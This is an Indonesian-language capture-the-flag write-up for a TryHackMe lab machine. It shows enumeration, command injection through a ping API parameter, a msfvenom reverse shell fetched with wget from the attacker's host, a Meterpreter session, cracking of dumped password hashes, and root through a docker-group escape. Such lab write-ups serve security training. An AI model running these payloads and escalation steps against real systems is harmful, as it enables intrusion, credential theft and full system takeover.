UltraTech Tryhackme
Enumerasi
7 min readDec 8, 2022
# Nmap 7.92 scan initiated Wed Dec 7 12:08:25 2022 as: nmap -p- -sV -sC -oN nmap-full.txt -T4 10.10.89.69
Nmap scan report for 10.10.89.69
Host is up (0.25s latency).
Not shown: 997 closed tcp ports (reset)
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 dc:66:89:85:e7:05:c2:a5:da:7f:01:20:3a:13:fc:27 (RSA)
| 256 c3:67:dd:26:fa:0c:56:92:f3:5b:a0:b3:8d:6d:20:ab (ECDSA)
|_ 256 11:9b:5a:d6:ff:2f:e4:49:d2:b5:17:36:0e:2f:1d:2f (ED25519)
8081/tcp open http Node.js Express framework
31331/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-title: Site doesn't have a title (text/html; charset=utf-8).
|_http-cors: HEAD GET POST PUT DELETE PATCH
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernelmenemukan 4 port yang terbuka. fokus 8081 menjakankan Node.js dan 31331 menjalankan apache web.
merangkak ke port 8081 yang menjalankan api. mari kita coba untuk bruteforcing halaman ini untuk mencari inforamsi file/folder
memaksa port 8081 dan menemukan 2 folder menarik..
┌──(wooxx㉿wanzroot)-[~/Documents/ultratech-thm]
└─$ gobuster dir -u http://10.10.243.157:8081/ -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt
===============================================================
Gobuster v3.3
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://10.10.243.157:8081/
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.3
[+] Timeout: 10s
===============================================================
2022/12/08 12:08:38 Starting gobuster in directory enumeration mode
===============================================================
Progress: 1279 / 207644 (0.62%)[ERROR] 2022/12/08 12:10:06 [!] Get "http://10.10.243.157:8081/libraries": context deadline exceeded (Client.Timeout exceeded while awaiting headers)
/auth (Status: 200) [Size: 39]
/ping (Status: 500) [Size: 1094]memaksa port 31331 menemukan folder menarik..
┌──(wooxx㉿wanzroot)-[~]
└─$ gobuster dir -u http://10.10.243.157:31331/ -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt
===============================================================
Gobuster v3.3
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://10.10.243.157:31331/
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.3
[+] Timeout: 10s
===============================================================
2022/12/08 12:13:17 Starting gobuster in directory enumeration mode
===============================================================
/images (Status: 301) [Size: 324] [--> http://10.10.243.157:31331/images/]
/css (Status: 301) [Size: 321] [--> http://10.10.243.157:31331/css/]
/js (Status: 301) [Size: 320] [--> http://10.10.243.157:31331/js/]
/javascript (Status: 301) [Size: 328] [--> http://10.10.243.157:31331/javascript/]mari kita uji port 8081 terlebih dahulu. berlari ke folder ping
kita menemukan kesalahan. mungkin ping memerlukan sebuah parameter.
lanjut kita ke folder auth..
ini memerlukan kredensial. lanut priksa hasil pemaksaan pad port 31331..
menemukan hal menarik di file api js sepertinya kita bisa melakukan ping melalui parameter ip mari kita coba.
Exploitasi
terhubung dan mengembalikan pesan balasan. mencoba beberap strins dan akhirnya bisa mendapatkan list directory yang di mana berisisi databases file
lanjut kita akan membuat reversehshell dengan msfvenom lalu unggah dengan python dan unduh dengn wget dan jalankan..
┌──(wooxx㉿wanzroot)-[~/Documents/ultratech-thm]
└─$ msfvenom -p cmd/unix/reverse_bash LHOST=10.18.3.26 LPORT=4444 -f raw > shell.sh
[-] No platform was selected, choosing Msf::Module::Platform::Unix from the payload
[-] No arch selected, selecting arch: cmd from the payload
No encoder specified, outputting raw payload
Payload size: 74 bytes- atur pendegar
msf6 > use multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set payload cmd/unix/reverse_bash
payload => cmd/unix/reverse_bash
msf6 exploit(multi/handler) > set LHOST 10.18.3.26
LHOST => 10.18.3.26
msf6 exploit(multi/handler) > run
[*] Started reverse TCP handler on 10.18.3.26:44442. server python
buat web server sederhana dengan python
┌──(wooxx㉿wanzroot)-[~/Documents/ultratech-thm]
└─$ sudo python3 -m http.server 80
[sudo] password for wooxx:
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...3. unduh di mesin target
┌──(wooxx㉿wanzroot)-[~/Documents/ultratech-thm]
└─$ sudo python3 -m http.server 80
[sudo] password for wooxx:
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
10.10.243.157 - - [08/Dec/2022 12:30:30] "GET /shell.sh HTTP/1.1" 200 -server menerima koneksi unduhan 200OK
4. jalankan file
[*] Started reverse TCP handler on 10.18.3.26:4444
[*] Command shell session 1 opened (10.18.3.26:4444 -> 10.10.243.157:57984) at 2022-12-08 12:31:58 -0500
id
uid=1002(www) gid=1002(www) groups=1002(www)dan kita berhasil terhubung dengan server. mari kita perbagus shell dengan module web_delivery.
msf6 > search web_del
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/multi/postgres/postgres_copy_from_program_cmd_exec 2019-03-20 excellent Yes PostgreSQL COPY FROM PROGRAM Command Execution
1 exploit/multi/script/web_delivery 2013-07-19 manual No Script Web Delivery
Interact with a module by name or index. For example info 1, use 1 or use exploit/multi/script/web_delivery
msf6 > use 1
[*] Using configured payload python/meterpreter/reverse_tcp
msf6 exploit(multi/script/web_delivery) > show targets
Exploit targets:
Id Name
-- ----
0 Python
1 PHP
2 PSH
3 Regsvr32
4 pubprn
5 SyncAppvPublishingServer
6 PSH (Binary)
7 Linux
8 Mac OS X
msf6 exploit(multi/script/web_delivery) > set target 7
target => 7
msf6 exploit(multi/script/web_delivery) > grep meterpreter show payload
msf6 exploit(multi/script/web_delivery) > grep meterpreter show payloads
7 payload/linux/x64/meterpreter/bind_tcp normal No Linux Mettle x64, Bind TCP Stager
8 payload/linux/x64/meterpreter/reverse_tcp normal No Linux Mettle x64, Reverse TCP Stager
9 payload/linux/x64/meterpreter_reverse_http normal No Linux Meterpreter, Reverse HTTP Inline
10 payload/linux/x64/meterpreter_reverse_https normal No Linux Meterpreter, Reverse HTTPS Inline
11 payload/linux/x64/meterpreter_reverse_tcp normal No Linux Meterpreter, Reverse TCP Inline
23 payload/linux/x86/meterpreter/bind_ipv6_tcp normal No Linux Mettle x86, Bind IPv6 TCP Stager (Linux x86)
24 payload/linux/x86/meterpreter/bind_ipv6_tcp_uuid normal No Linux Mettle x86, Bind IPv6 TCP Stager with UUID Support (Linux x86)
25 payload/linux/x86/meterpreter/bind_nonx_tcp normal No Linux Mettle x86, Bind TCP Stager
26 payload/linux/x86/meterpreter/bind_tcp normal No Linux Mettle x86, Bind TCP Stager (Linux x86)
27 payload/linux/x86/meterpreter/bind_tcp_uuid normal No Linux Mettle x86, Bind TCP Stager with UUID Support (Linux x86)
28 payload/linux/x86/meterpreter/reverse_ipv6_tcp normal No Linux Mettle x86, Reverse TCP Stager (IPv6)
29 payload/linux/x86/meterpreter/reverse_nonx_tcp normal No Linux Mettle x86, Reverse TCP Stager
30 payload/linux/x86/meterpreter/reverse_tcp normal No Linux Mettle x86, Reverse TCP Stager
31 payload/linux/x86/meterpreter/reverse_tcp_uuid normal No Linux Mettle x86, Reverse TCP Stager
32 payload/linux/x86/meterpreter_reverse_http normal No Linux Meterpreter, Reverse HTTP Inline
33 payload/linux/x86/meterpreter_reverse_https normal No Linux Meterpreter, Reverse HTTPS Inline
34 payload/linux/x86/meterpreter_reverse_tcp normal No Linux Meterpreter, Reverse TCP Inline
msf6 exploit(multi/script/web_delivery) > set payload linux/x86/meterpreter/reverse_tcp
payload => linux/x86/meterpreter/reverse_tcp
msf6 exploit(multi/script/web_delivery) > set LHOST 10.18.3.26
LHOST => 10.18.3.26
msf6 exploit(multi/script/web_delivery) > set LPORT 5555
LPORT => 5555
msf6 exploit(multi/script/web_delivery) > run
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.
msf6 exploit(multi/script/web_delivery) >
[*] Started reverse TCP handler on 10.18.3.26:5555
[*] Using URL: http://10.18.3.26:8080/VIjlJmHErNk961
[*] Server started.
[*] Run the following command on the target machine:
wget -qO UmIE2Kej --no-check-certificate http://10.18.3.26:8080/VIjlJmHErNk961; chmod +x UmIE2Kej; ./UmIE2Kej& disown
[*] 10.10.243.157 web_delivery - Delivering Payload (207 bytes)
[*] Sending stage (989032 bytes) to 10.10.243.157
[*] Meterpreter session 1 opened (10.18.3.26:5555 -> 10.10.243.157:44670) at 2022-12-08 12:37:13 -0500
msf6 exploit(multi/script/web_delivery) > sessions 1
[*] Starting interaction with 1...
meterpreter > sysinfo
Computer : 10.10.243.157
OS : Ubuntu 18.04 (Linux 4.15.0-46-generic)
Architecture : x64
BuildTuple : i486-linux-musl
Meterpreter : x86/linux
meterpreter > good. kita mendapatkan shell meterpreter.
meterpreter > ls -la
Listing: /home/www/api
======================
Mode Size Type Last modified Name
---- ---- ---- ------------- ----
100775/rwxrwxr-x 207 fil 2022-12-08 12:36:57 -0500 UmIE2Kej
100644/rw-r--r-- 1750 fil 2019-03-22 14:07:09 -0400 index.js
040775/rwxrwxr-x 4096 dir 2019-03-22 14:07:35 -0400 node_modules
100644/rw-r--r-- 42702 fil 2019-03-22 14:07:09 -0400 package-lock.json
100644/rw-r--r-- 370 fil 2019-03-22 14:07:09 -0400 package.json
100664/rw-rw-r-- 74 fil 2022-12-08 12:25:43 -0500 shell.sh
100664/rw-rw-r-- 103 fil 2019-03-22 09:50:14 -0400 start.sh
100644/rw-r--r-- 8192 fil 2019-03-22 14:07:09 -0400 utech.db.sqlite
meterpreter >melihat isi directory file sqlite nmapkanya menarik untuk di analis. download ke mesin lokal.
Privlage-Escalation
meterpreter > download utech.db.sqlite
[*] Downloading: utech.db.sqlite -> /home/wooxx/Documents/ultratech-thm/utech.db.sqlite
[*] skipped : utech.db.sqlite -> /home/wooxx/Documents/ultratech-thm/utech.db.sqlite
meterpreter >mari ekstrack databases..
┌──(wooxx㉿wanzroot)-[~/Documents/ultratech-thm]
└─$ sqlite3 utech.db.sqlite
SQLite version 3.39.2 2022-07-21 15:24:47
Enter ".help" for usage hints.
sqlite> .dump
PRAGMA foreign_keys=OFF;
BEGIN TRANSACTION;
CREATE TABLE users (
login Varchar,
password Varchar,
type Int
);
INSERT INTO users VALUES('admin','0d0ea5111e3c1def594c1684e3b9be84',0);
INSERT INTO users VALUES('r00t','f357a0c52799563c7c7b76c1e7543a32',0);
COMMIT;
sqlite>mari kita pecahkan hash kata sandi dengan crackstation
menemukan. cek berapa pengguna di folder home.
meterpreter > ls /home
Listing: /home
==============
Mode Size Type Last modified Name
---- ---- ---- ------------- ----
040755/rwxr-xr-x 4096 dir 2019-03-22 14:17:06 -0400 lp1
040755/rwxr-xr-x 4096 dir 2019-03-22 11:55:31 -0400 r00t
040755/rwxr-xr-x 4096 dir 2019-03-22 14:15:48 -0400 www
meterpreter > karna sesuai hash mungkin ini sandi user r00t coba login..
meterpreter > shell
Process 2256 created.
Channel 2 created.
python3 -c 'import pty;pty.spawn("/bin/bash")'
www@ultratech-prod:~/api$ su r00t
su r00t
Password: n100906
r00t@ultratech-prod:/home/www/api$ id
id
uid=1001(r00t) gid=1001(r00t) groups=1001(r00t),116(docker)
r00t@ultratech-prod:/home/www/api$dan berasil masuk ke r00t user.
kita memilki grub docker menarik. memeriksa images docker.
r00t@ultratech-prod:/home/www/api$ docker images
docker images
REPOSITORY TAG IMAGE ID CREATED SIZE
bash latest 495d6437fc1e 3 years ago 15.8MB
ir00t@ultratech-prod:/home/www/api$wow container bash. beralari ke GTFobins untuk mencari exploitasi
ganti nama images dengan yang kita punya..
r00t@ultratech-prod:~$ docker run -v /:/mnt --rm -it bash chroot /mnt sh
docker run -v /:/mnt --rm -it bash chroot /mnt sh
# id
id
uid=0(root) gid=0(root) groups=0(root),1(daemon),2(bin),3(sys),4(adm),6(disk),10(uucp),11,20(dialout),26(tape),27(sudo)
# whoami
whoami
root
# yaps dan kita bisa mengendalikan sistem dengan akses tertinggi…
